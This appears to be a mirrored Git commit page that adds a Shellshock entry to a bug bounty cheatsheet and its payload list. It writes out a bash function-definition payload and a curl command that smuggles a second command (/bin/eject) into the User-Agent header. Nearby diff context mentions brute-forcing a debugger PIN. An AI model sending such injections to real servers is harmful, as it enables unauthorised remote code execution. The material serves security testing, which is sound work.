Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-24 20:13:06 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add Shellshock bug.

Browse source
This commit is contained in:
EdOverflow 2017-07-14 15:25:52 +01:00
parent 20332b8519
commit f1a044b6b6
2 changed files with 15 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
cheatsheets/rce.md
View file

@ -8,4 +8,14 @@ Find somewhere where user input can be supplied and submit the following string
strіng
```
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
**Shellshock Bug**
```bash
() { :;}; echo vulnerable
```
```zsh
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
```

4
payloads.txt
View file

@ -57,6 +57,10 @@ http://[::]
strіng
() { :;}; echo vulnerable
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
/%09/google.com
/%5cgoogle.com